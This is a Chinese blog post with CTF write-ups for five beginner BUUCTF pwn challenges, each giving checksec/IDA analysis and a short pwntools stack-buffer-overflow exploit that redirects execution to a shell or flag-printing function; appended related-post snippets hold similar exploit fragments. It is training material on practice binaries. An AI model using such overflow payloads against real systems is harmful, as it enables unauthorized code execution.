刷题 - BUUCTF(BUUOJ) - PWN - DAY3

已于 2023-09-24 22:11:12 修改
阅读量232 收藏 1
点赞数 1
分类专栏: ctf buuctf pwn 文章标签: bug python
于 2023-08-02 15:01:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_36902977/article/details/132059313
版权
文章详细描述了如何利用checksec和IDA等工具分析和解题五个网络安全竞赛题目,涉及栈溢出、canary检查、函数调用和系统命令执行,展示了Pwn技术在实际解题中的应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

BUUCTF PWN

(一)test_your_nc

题目地址

test_your_nc

解题思路

  1. 用checksec查看,发现没有开启canary
    checksec

  2. 用IDA查看string,通过交叉引用发现main函数调用了/bin/sh
    ida
    command
    sh

  3. nc到靶机即可启动shell终端,得到flag
    nc

工具:checksec, IDA, nc

工具说明
#checksec
checksec --file=test
#nc
nc hostname port #监听服务器端口

(二)rip

题目地址

rip

解题思路

  1. checksec查看发现没有开栈保护,可以用栈溢出攻击
    checksec

  2. 用IDA查看函数,发现main函数调用了gets,没有检查栈溢出,此外还有一个fun函数执行/bin/sh,于是想到用栈溢出得到shell
    main
    在这里插入图片描述

  3. 用nm查看fun地址为0000000000401186
    nm

  4. 在IDA查看gets参数s长度为15
    s

  5. 构造EXP,请求靶机,得到flag

from pwn import *
sh=remote('node4.buuoj.cn',27298)
addr_of_fun = 0x401186
sh.sendline(b'A'*23 + p64(addr_of_fun+1)) # 23=15(输入参数s长度)+ 8(64位CPU下rdp宽度),+1为堆栈对齐
sh.interactive()

pwn

工具:checksec、IDA

(三)warmup_csaw_2016

题目地址

warmup_csaw_2016

解题思路

  1. 用checksec查看,发现没有开启canary
    checksec

  2. 用IDA查看string,通过交叉引用发现sub_40060D()方法调用了cat flag.txt
    catflagtxt
    pseudocode

  3. 综上,加上在main函数中发现危险函数gets(),因此要通过栈溢出触发sub_40060D()方法,右键菜单切换到text view记下地址
    getstextview

  4. 由char v5[64];知道v5的分配空间是64db,加上偏移量8db(64位系统默认),因此要72db才能满足栈溢出条件,编写EXP文件并执行

from pwn import *
sh=remote('node4.buuoj.cn',25131)
addr_of_40060D = 0x40060D
sh.sendline(b'A'*72 + p64(addr_of_40060D))
sh.interactive()

在这里插入图片描述

工具:checksec, IDA

(四)ciscn_2019_n_1

题目地址

ciscn_2019_n_1

解题思路

  1. 用checksec查看,发现没有开启canary
    check

  2. 用IDA查看string,通过交叉引用发现func函数调用了cat /flag,而main函数调用了func函数,func函数如果v2的值等于11.28125,即触发系统命令输出flag,所以我们的思路是通过gets函数的栈溢出改变v2的值,令其满足条件,而v1的大小为44db
    guess
    func
    main

  3. 11.28125换算成16进制为0X41348000,编写EXP,获取flag

from pwn import *
sh=remote('node4.buuoj.cn',26351)
v2 = 0X41348000
sh.sendline(b'A'*44 + p64(v2))
sh.interactive()

flag

工具:checksec, IDA

(五)pwn1_sctf_2016

题目地址

pwn1_sctf_2016

解题思路

  1. 用IDA查看string,通过交叉引用发现get_flag函数调用了cat flag.txt,而main函数调用了vuln函数,vuln函数包含一个gets函数,所以我们的思路是通过fgets函数的栈溢出去到get_flag函数的入口,令其执行cat flag.txt系统命令
    str

get_flag
vuln

  1. 上面程序的逻辑是写入字符串“you”,再写入字符串“I”,把I替换成“you”,相当于1个字节转换成3个字节,而s的地址为0000003C,相当于十进制的60,又因为有exeinfo看出程序是32位的,因此加4db的偏移,刚好溢出,再加上get_flag的地址8048F0D
    sget_flag_address
    exeinfo

  2. 编写EXP,获取flag

from pwn import *
sh=remote('node4.buuoj.cn',27965)
get_flag_address = 0X8048F0D
sh.sendline(b'I'*20 + b'a'*4 + p32(get_flag_address ))
sh.interactive()

flag

工具:checksec, IDA, Exeinfo PE

BUUCTF-PWN记录-14
weixin_44145820的博客
04-29 872
目录sctf_2019_easy_heap(块重叠,double free) sctf_2019_easy_heap(块重叠,double free) 这目好像是在Ubuntu16下的,但是BUU上面是Ubuntu18,所以应该更简单一点 总的来说,这应该是ciscn_2019_final_3的加强版吧,当然也有更简单的地方 首先,给了我们一块rwx的空间 add函数会给你conten...
2021-09-07 BUUCTF-PWN 记录
m0_56897090的博客
09-07 685
2021-09-07 roarctf_2019_easy_pwn 0x00 目分析 堆 整体功能 增加 删除 修改 输出 保护情况: root@ubuntu:~## pwn checksec roa* [*] '/root/roarctf_2019_easy_pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE:
二进制的保护机制
weixin_30872671的博客
05-29 305
这里主要讲的是CTF中linux下的ELF二进制文件的保护机制。在linux中有一个脚本checksec命令可以查看当前二进制文件的保护机制。任意安装一款gdb插件都会把checksec脚本包含进来。 在gdb中执行: gdb> checksec test Canary : No NX ...
Buuoj Pwn
VisualNull的博客
05-22 350
babyrop WP 一道比较简单的ret2libc 考察点为strlen函数遇到\x00返回 但是有一个坑 IDA逆向拿到伪代码 main函数 逻辑是程序开始运行时读入一个随机数 然后传给并调用sub_804871F函数 sub_804871F函数 a1为main函数传入的随机数(buff) 格式化后将a1给了s 之后从终端读入数据给buf 然后将数组buf的某个元素变为0(这是一个坑) 之后获取buf的长度(strlen函数) 这里是第一个利用..
BUU pwn rip BUU pwn test_your_nc
最新发布
A_fish_like_sing的博客
03-13 2114
这段代码包含一个经典的缓冲区溢出漏洞。攻击者可以利用。
buuoj pwn
FFY's Blog
10-07 1145
ret2text rip pwntools gdb 调试 gdb.debug(’./xxx’) pause() 在弹出窗口设好断点,用 python 传递不可打印字符 堆栈平衡,简单溢出 from pwn import * #context.log_level='debug' #p=remote('node3.buuoj.cn',27864) #p=gdb.debug('./pwn1') #pause() target_addr=0x401186 ret_addr=0x401016 pay='a'*(
BUUOj PWN 121-140
2h4ox1n9
12-17 163
121、ciscn_2019_final_5 122、picoctf_2018_are you root 123、[BJDCTF 2nd]diff 124、bjdctf_2020_YDSneedGrirlfriend 125、judgement_mna_2016 126、gyctf_2020_document 127、护网杯_2018_gettingstart 128、xman_2019_format
buuoj Pwn wp 1-10
yongbaoii的博客
01-09 752
01 test_your_nc 直接连上就好了。 然后 cat flag 。 02 rip ret2text. 这多多少少有点问。 IDA里面是这样的,但是exp一直有问,然后试着连上直接跑,是这样的。 栈溢出到返回地址就行。 from pwn import* r = remote("node3.buuoj.cn",26737) context.log_level = "debug" system_addr = 0x401187 payload = 'a' * 23 + p64(syste
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
CTF-PWN-buuctf-pwn1_sctf_2016-CPP的字符串替换
serfend's blog
04-14 571
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1bSrSQZYWkBIWCXP5Lsq7sg?pwd=mpgo 提取码:mpgo 答案:flag{714a8f91-7e24-440c-8cc6-1f2d26adbcec} 总体思路 发现get_flag的位置 发现输入会被替换,构造exp 详细步骤 查看文件信息 查看目发现是将用户输入的I替换为you,虽然输入的时候只允许输入32位,但是因为替换
2021-08-30 BUUCTF记录PWN
m0_56897090的博客
08-30 646
2021-08-30 BUUCTF记录 数量:13 目分类:栈溢出、堆、pwn基础 文章目录2021-08-30 BUUCTF记录[Black Watch 入群]PWN0x00 目描述0x01 分析思路0x02 EXPez_pz_hackover_20160x00 目描述0x01 目分析0x02 思路0x03 EXPjarvisoj_tell_me_something0x00 目描述0x01 目分析0x02 EXPJarvisoj_level30x00 目描述0x01 目思路0
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 588
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
buuoj Pwn writeup 241-245
yongbaoii的博客
08-31 378
241 [GKCTF 2021]checkin 逻辑也比较简单。 首先输入密码的时候可以有个溢出,但是只能溢出八个字节,就只能是做一个栈迁移。 然后有个检查,首先你的名字需要是admin,然后你的密码要走一个函数。 我们去看看那个函数。 好像很复杂。 0x4007f6那个函数点开。 瞬间明白是一个md5. 所以逻辑很简单,我们输入的密码通过md5加密之后要跟v4吻合。 我们发现密码admin的md5加密结果是那个。 所以就直接栈迁移就行。 栈迁移呢需要我们在bss上写东西,输入用户名可以做到,然后呢还
buuoj Pwn writeup 271-275
yongbaoii的博客
09-06 384
271 espcially_tu_2016 就是一个栈溢出。 但是这个最麻烦的是他scanf之后居然缓冲区里面有一个回车,导致我们gets的时候失败了,所以我们就gets了两次。 为了看看是scanf的问还是ios_c99scanf的问,做了个小实验。 编译的时候记得加-std=c89 但是发现scanf也是一样的效果。 就是会留下一个回车。 那我们试试读入字符串。 还是会有一个回车。 那我们下面再放一个scanf 再走第二个scanf的时候会新缓冲区的指针。 那如果放的是gets 跑程序的时
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 449
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
buuoj Pwn writeup 66-70
yongbaoii的博客
02-23 334
66 ciscn_2019_final_3 保护 67 mrctf2020_shellcode 保护 68 hitcontraining_magicheap 保护 69 pwnable_start 保护 70 wustctf2020_getshell_2 保护
BUU PWN(一)
playmaker的博客
01-28 2329
test_your_nc 连上即可拿到shell rip from pwn import * context.log_level='debug' #p=process('./17pwn1') p=remote("node3.buuoj.cn","26137") p.recvuntil("please input\n") payload='a'*0xf+'a'*8+p64(0x401186) p.s...
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 476
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
buuoj Pwn writeup 206-210
yongbaoii的博客
08-31 536
206 ciscn_2019_c_3 一堆乱七八糟。 create 207 metasequoia_2020_summoner 208 linkctf_2018.7_babypie 209 wdb_2018_3rd_pesp 210 TWCTF_online_2019_asterisk_alloc
buuctf-pwn入门
01-26
### BUUCTF PWN目入门教程 #### 学习资源推荐 对于希望进入PWN挑战领域的新手来说,选择合适的教材和平台至关重要。王爽老师的《汇编语言》提供了基础理论支持,有助于理解底层操作原理[^1]。此外,《IDA Pro...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值